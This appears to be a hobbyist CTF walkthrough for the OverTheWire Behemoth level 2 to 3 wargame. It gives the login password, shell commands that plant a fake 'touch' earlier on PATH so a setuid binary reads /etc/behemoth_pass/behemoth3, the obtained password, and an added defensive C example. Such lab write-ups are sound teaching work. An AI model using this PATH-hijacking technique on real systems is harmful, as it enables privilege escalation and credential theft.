Part-time CTF player, learning every day!!
🌠 I Love Hoshimachi Suisei!! 🌠

OverTheWire Behemoth Level 2 → 3 tutorial!!

Login

Log in as behemoth2 using the password you obtained from Level 1 → 2.

ssh behemoth2@behemoth.labs.overthewire.org -p 2221
# password: eimahquuof

Task

The binary /behemoth/behemoth2 uses system("touch <pid>"). Our goal is to hijack the program’s call to touch so that it runs our own script instead, revealing the password for behemoth3.


A little bit of Theory

  • system() hands the command string to /bin/sh -c, and the shell resolves a bare command name like touch by searching the directories listed in the $PATH environment variable, in order; the first match wins.
  • If we put our own directory first in $PATH and create a fake touch binary, the program will execute ours.
  • This is known as a PATH hijacking attack.
  • Our fake touch just calls cat /etc/behemoth_pass/behemoth3.
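To make the theory concrete from the defender's side, here is an added C example (not the behemoth2 source and not from this blog) that puts the vulnerable system("touch <pid>") pattern next to a hardened in-process replacement, plus a `which`-style lookup that shows which file a given PATH would actually run. Function names, the /tmp demo directory and the PATH string are my own constructions.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable pattern (as in behemoth2): /bin/sh resolves "touch" through the
   caller-controlled PATH, so a setuid binary runs whatever the caller put first. */
int touch_via_system(void) {
    char cmd[64];
    snprintf(cmd, sizeof cmd, "touch %d", (int)getpid());
    return system(cmd);
}

/* Hardened form: do the work in-process. No shell, no PATH lookup, and
   O_NOFOLLOW refuses a planted symlink at that path. Returns 0 on success. */
int touch_in_process(const char *path) {
    int fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW, 0644);
    if (fd < 0) return -1;
    int rc = futimens(fd, NULL);  /* NULL: set both timestamps to now */
    close(fd); return rc;
}

/* Defender's check, like `which`: which file would a PATH lookup of cmd run?
   Returns 0 and writes the winning path to out[], or -1 if nothing matched. */
int first_in_path(const char *cmd, const char *path, char *out, size_t n) {
    char copy[4096], *save = NULL;
    snprintf(copy, sizeof copy, "%s", path);
    for (char *d = strtok_r(copy, ":", &save); d; d = strtok_r(NULL, ":", &save)) {
        snprintf(out, n, "%s/%s", d, cmd);
        if (access(out, X_OK) == 0) return 0;
    }
    out[0] = '\0'; return -1;
}

/* Self-contained demo in a constructed temporary directory: a writable directory
   placed first on PATH shadows the real touch. Returns 1 if the planted file wins. */
int hijack_wins(void) {
    char dir[] = "/tmp/pathdemo.XXXXXX", fake[256], pathenv[512], found[512];
    if (!mkdtemp(dir)) return -1;
    snprintf(fake, sizeof fake, "%s/touch", dir);
    if (touch_in_process(fake) != 0 || chmod(fake, 0755) != 0) return -1;
    snprintf(pathenv, sizeof pathenv, "%s:/usr/bin:/bin", dir);
    int shadowed = first_in_path("touch", pathenv, found, sizeof found) == 0
                   && strcmp(found, fake) == 0;
    unlink(fake); rmdir(dir);
    return shadowed;
}
```

The fix that matters is touch_in_process: a setuid program that never calls a shell has no command name for $PATH to resolve, so there is nothing to hijack.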

Solution

  1. Confirm program behavior with ltrace

    ltrace ./behemoth2
    

    You’ll see a call like:

    system("touch 17924")
    

    confirming that it invokes touch by bare name, leaving the shell to resolve it through $PATH.

  2. Create a fake touch

    mkdir /tmp/fake
    cd /tmp/fake
    echo "cat /etc/behemoth_pass/behemoth3" > touch
    chmod 777 touch
    
  3. Prepend our directory to PATH

    export PATH=/tmp/fake:$PATH
    
  4. Run the vulnerable binary

    /behemoth/behemoth2
    

    Since $PATH points to our fake script first, it executes our touch, which prints the next password.


Password

This is the password from my run; if yours differs, use the one your terminal printed.

nietiediel

Troubleshooting

  • Still calling real touch → Make sure /tmp/fake is the first entry in $PATH.
  • Permission denied → Ensure your fake touch is executable (chmod +x touch).
  • No output → Your fake script must only contain: cat /etc/behemoth_pass/behemoth3

Copy-paste quick run (one shot)

ssh behemoth2@behemoth.labs.overthewire.org -p 2221
# password: eimahquuof

mkdir /tmp/fake && cd /tmp/fake
echo "cat /etc/behemoth_pass/behemoth3" > touch
chmod 777 touch
export PATH=/tmp/fake:$PATH

/behemoth/behemoth2
# → should print password for behemoth3

Congrats 🎉 You hijacked the system() call by overriding $PATH, tricked the binary into running your fake touch, and obtained the password for behemoth3!


Thanks for reading!

Until next time — Otsumachi!! 💖☄️✨
